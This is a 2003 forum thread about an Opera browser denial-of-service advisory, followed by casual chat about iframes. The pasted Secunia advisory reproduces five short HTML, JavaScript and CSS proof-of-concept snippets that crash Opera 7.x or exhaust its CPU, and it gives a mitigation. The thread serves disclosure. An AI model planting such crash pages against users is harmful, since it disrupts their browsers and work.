[Site Home] [Forum Home] [Articles] [File DB] [News Archives]

Software and Hardware -> Opera Dos Danger


(View original topic)


Chris Vogel - Jul-02-2003 server time
QUOTE (Red Squirrel @ Jul 2 2003, 02:29 PM)
<iframe src="page" width="200" height="200"></iframe>

There's more parameters such as getting rid of the border, but I forget what they are.  borderwidth="" I think

It does look sort of neat. smile.gif

Thanks for a mini HTML lesson too, Red! roflmao.gif dancingbanada.gif dancingbanada.gif

Red Squirrel - Jul-02-2003 server time
<iframe src="page" width="200" height="200"></iframe>

There's more parameters such as getting rid of the border, but I forget what they are. borderwidth="" I think

Chris Vogel - Jul-02-2003 server time
QUOTE (Red Squirrel @ Jul 2 2003, 09:12 AM)
Actually, I noticed something cool in mozilla. Does not seem to work with IE or Opera though. Create a file called iframe.htm (or anything) and put an iframe in it pointing to itself, now open it. It's pretty cool. laugh.gif

I don't know how to make iframes yet. huh.gif laugh.gif

Red Squirrel - Jul-02-2003 server time
Actually, I noticed something cool in mozilla. Does not seem to work with IE or Opera though. Create a file called iframe.htm (or anything) and put an iframe in it pointing to itself, now open it. It's pretty cool. laugh.gif

Chris Vogel - Jul-01-2003 server time
I think Tracy and XmimicX are the only people here who use Opera as their main browser. laugh.gif

I use Mozilla, so this isn't a problem for me. cool.gif

Red Squirrel - Jul-01-2003 server time
http://www.secunia.com/advisories/9156/ ohmy.gif


elease Date: 2003-07-01

Critical: Not critical
Impact: DoS
Where: From remote

Software: Opera 7.x


Description:
Multiple DoS (Denial of Service) issues have been reported in the Opera browser.

A malicious person can exploit these to either crash the browser due to some NULL pointer dereference bugs or in some cases make it consume vast amounts of CPU resources.

The following five examples was provided in the original advisory:

#1
<!DOCTYPE[NULL byte]A>

#2
<form></form><script>document.forms[0].submit()</script>

#3
<table>
<tr id="crash" style="display:inline"><td>
<script>crash.style.display = "none";</script>
</td></tr>
</table>

#4
<table>
<map id="crash" style="position:absolute"></map>
<script>crash.style.height = crash.style.width = '0';</script>
</table>

#5
<html>
<head>
<style type="text/css">
<!--
.aaaaa:after{content:"A";display:block}
.bbbbb{display:run-in}
.ccccc{display:inline-block}
//-->
</style>
</head>
<body>
<div class="aaaaa">
<div class="bbbbb">
<div class="ccccc">
</div>
</div>
</div>
</body>
</html>


The issues have been reported in the following versions for Windows:

7.11b build 2887
7.11 build 2880
7.10 build 2840
7.03 build 2670


However, Secunia has also been able to confirm the issues in version 7.11 for Linux. Prior versions may also be affected.

Solution:
If regarded as a security threat, all issues except #1 can be eliminated by disabling JavaScript support and the setting "Author mode by default".

Reported by / credits:
imagine and nesumin, :: Operash ::

(Showing 50 last posts, newest on top)